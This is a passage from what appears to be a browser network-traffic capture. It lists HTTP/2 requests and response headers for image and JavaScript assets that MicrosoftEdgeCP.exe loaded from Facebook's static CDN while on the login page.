document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: tV/tvrjhb0oNwoXHhZ+21w==
x-fb-debug: JrAUmHJKZE6tfSq4RetmTGhk6yrGoKBq5UFdlHvfXA1NHiPnn1bsA9VC9iB5D8CersMAODjAgrgmEuAc1JSzKA==
content-length: 2048
date: Mon, 30 Oct 2023 06:48:43 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yB/r/Y0L6f5sxdIV.png HTTP/2.0
host: static.xx.fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: hFRfTj3CmfIMC+ZxDLCYWA==
expires: Thu, 24 Oct 2024 20:47:43 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
x-fb-debug: n5m3SUEAn8Yu0jzL4Niu5XyqnroXkJuAmwwCU9UYTCjxVL1az546dW47G/ZsH2fQXSO/2yo3BpSarUXLQGL3gg==
content-length: 6739
date: Mon, 30 Oct 2023 06:48:43 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 25 Oct 2024 02:56:20 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: ibx/YS3+M1U14eOcawxFtw==
x-fb-debug: kuNx3z1A/qQSLTFEcRex77D+EHczs6CF3OTVUi3mfGzJ23XVnJsbc/JkLt7U3XhDAjaJT4UhitS0xQQXu+bANQ==
content-length: 2161
date: Mon, 30 Oct 2023 06:48:43 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/pD68cOkOMec.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yc/r/pD68cOkOMec.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 27 Oct 2024 15:01:35 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: 95wuAyZvurXYMf9v3OdLQg==
x-fb-debug: 61yuSfuJay5JzTM/9+fj7kyORFDzmcWZyCvhI8we5FbNCGB9NRxY1M7cPgfFx1UDXg7g69eExZhKVvqXtQVOtw==
content-length: 4504
date: Mon, 30 Oct 2023 06:48:43 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/bG0oiWXQIFv.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/y9/r/bG0oiWXQIFv.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 20:52:04 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: mhtzz0xYjDwzfzFxGZtp5A==
x-fb-debug: 4Okfr2/D0wFRF7RObNOjY1y49Q4MKtugCoOnI26qjo6sPmHxk++DbjZLq7IKUsSztzoUjSdfrJydvD3CbZRPPA==
content-length: 7383
date: Mon, 30 Oct 2023 06:48:43 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/waLvPG4m_lK.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yt/r/waLvPG4m_lK.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 14:50:02 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: x0igbgZNaXUgqs5LbeZrjA==
x-fb-debug: TYZ7yE6zxzV+AN5bzON1yP5paIOFUlZYuEfivSf0hOzEmkL6O+XvAtjxPvul6W9KBw9DnblB7Q2NuTdV+XNrjg==
content-length: 7430
date: Mon, 30 Oct 2023 06:48:45 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/N9t1W9oe3ma.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yv/r/N9t1W9oe3ma.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 21:07:01 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: nZgLQrniSukxvIJvkZmsKQ==
x-fb-debug: lETJX20qRjyV0IVw6yd+1wU/cPK45/eZiK+UZTaGjuuwQo7BYfNbSa5gCcontXI2W9tbKXqKgR1cr+pss1pYKw==
content-length: 5811
date: Mon, 30 Oct 2023 06:48:46 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 20:11:37 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: 8dfASsSkIxmrAAqQotd3rg==
x-fb-debug: /6kYpIOVEPNbMniUgyEyNmZ30r7fBmxxzGT1D4DE7l6TEA2EStEEw5XTkVFcnOWpuN9R7tIOaOE84mCwzJNOAA==
content-length: 3066
date: Mon, 30 Oct 2023 06:48:47 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 19:32:23 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
x-fb-optimizer: 0
content-md5: L5E9gSgR735vyjAzTFly4g==
x-fb-debug: l6NAS7UDxKy9HAjhwMEboxXuLBbrSz1j+zZlfJ/rxXetf/Ntbz8wZbCopvdwscBDrFiNLYgMdAfqfnu8f2IjwA==
content-length: 293
date: Mon, 30 Oct 2023 06:48:49 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yo/r/z4ZpfEug0KG.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yo/r/z4ZpfEug0KG.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 28 Oct 2024 14:21:49 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: gEmaZyeyFxKrHdplHXiLoA==
x-fb-debug: ppfwwTob6ebPLAVqd4y74iClQxhcj/jMHFgbjC22eSWR0wudSWlrSr14S6z4NgfPBE91DURr6H4/44Ckq5Wirg==
content-length: 12007
date: Mon, 30 Oct 2023 06:48:50 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/H6eWxkmnnTy.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yv/r/H6eWxkmnnTy.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 25 Oct 2024 18:50:59 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: 8+zG0cL5AxSt46LI7EOUrg==
x-fb-debug: nlUF5J1lsgS3M7sUURZG+GKN1HhT/Q3drToSdVXKH81l+wz84s46quplm4gVZfj078wRPyzgG4FRHlnfb1An6Q==
content-length: 5026
date: Mon, 30 Oct 2023 06:48:53 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/mcFwTxKKnU1.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yg/r/mcFwTxKKnU1.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 21:08:45 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: KUTu3nkKKUwJR3EO3LKGwQ==
x-fb-debug: luJ5Gu+a3cX7wmKI1NdAosZzaey/gzHZ969bNDXTJrf1w86+Ln/rcam7PUi13UeNFqiQpD+v6caqNvwu+r+kiw==
content-length: 15429
date: Mon, 30 Oct 2023 06:48:56 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/ui2DkP-wt_7.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 21:08:18 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: k+R7eY3Xrv/nId1snIjgBw==
x-fb-debug: Qy2F8gN/1WBam9EcKaK6cjP+7yXdLu+iJfb72VCGcB60w4Bv/DaTOqp+8KGwsRq+vFPbKPMwxnzeuRIZ23i7DA==
content-length: 3489
date: Mon, 30 Oct 2023 06:48:59 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yG/r/1-4kfeCLxqe.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yG/r/1-4kfeCLxqe.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 14:50:02 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: gGIhu2jw/N6ze1zaQmL8Pg==
x-fb-debug: wgrxHmIdeAKOwp9rcNK/4pKrmVodHfpQhBFNXxswCrnZVpwi5vqxgv+WRhBnlV3qJpiMPGfZQcmWH5JxHc8vRA==
content-length: 2714
date: Mon, 30 Oct 2023 06:49:04 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/8wkP5LeHDwh.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yW/r/8wkP5LeHDwh.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 14:50:02 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: NPtWdbtL0L5REMPAQP9vkQ==
x-fb-debug: Xk09s3I/t/wAsN1P+QjQ4RT+gQKxbOXXk08joTSpNKTRAUbCrEpiR3HKtSZUTWd9kVW8Suv/7q3n09vpVbRFgw==
content-length: 1856
date: Mon, 30 Oct 2023 06:49:04 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/rIzL2o9IwFW.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yn/r/rIzL2o9IwFW.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 28 Oct 2024 14:21:50 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: tVJRXj2YCOBRLMiP+bOxVg==
x-fb-debug: UeraYHrZDaqlL6sZrzunY9g0MCkb813uuYL9zXI4nE5HgRHmM8de4ieDBDwTijzg0x9ejpy2KMpTjadqt2/lCQ==
content-length: 6857
date: Mon, 30 Oct 2023 06:49:04 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3i8JF4/yf/l/en_US/iS01O7Vrj6z.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3i8JF4/yf/l/en_US/iS01O7Vrj6z.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 15:34:24 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: g033piZBuXkajCUtMf7msw==
x-fb-debug: 1bd8dpBDOM2jVg0vFUykrMdUkZv3b6PT2CfT9Kzu3Y8xl9wzB+ktvlmkidpz0/XoXMUNxHXHk7GuNkE7HrjXgg==
content-length: 22881
date: Mon, 30 Oct 2023 06:49:04 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/DB5AGw-VyeA.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yW/r/DB5AGw-VyeA.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 28 Oct 2024 14:37:52 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: raLewGIW2dlHANtzwgPiQw==
x-fb-debug: bzeBsV9KbvlUbtwpNZfW2mlUAW3HGjTtNt27QA3GAITUhn1Mri4D+Xc9OQWkmlBNZfDQhNv5xIOByyEf6u5rFg==
content-length: 2173
date: Mon, 30 Oct 2023 06:49:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/f8sllusvByo.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yB/r/f8sllusvByo.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 14:50:02 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: D0uv4+wDDRf1er6XhWyW9g==
